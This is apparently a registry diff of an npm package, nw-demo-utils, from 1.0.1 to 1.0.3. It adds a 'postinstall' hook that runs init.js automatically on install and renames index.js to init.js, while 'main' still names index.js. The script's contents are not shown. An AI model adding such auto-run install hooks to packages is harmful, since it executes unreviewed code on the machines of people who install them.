nw-demo-utils 1.0.1 → 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +2 -2
- /package/{index.js → init.js} +0 -0
package/package.json
CHANGED
|
@@ -1,10 +1,10 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "nw-demo-utils",
|
|
3
|
-
"version": "1.0.
|
|
3
|
+
"version": "1.0.3",
|
|
4
4
|
"description": "Extended utility functions and helper modules for the nw-demo integration suite.",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
|
-
"
|
|
7
|
+
"postinstall": "node ./init.js"
|
|
8
8
|
},
|
|
9
9
|
"author": "Atlassian Ecosystem Engineering",
|
|
10
10
|
"license": "Apache-2.0",
|
/package/{index.js → init.js}
RENAMED
|
File without changes
|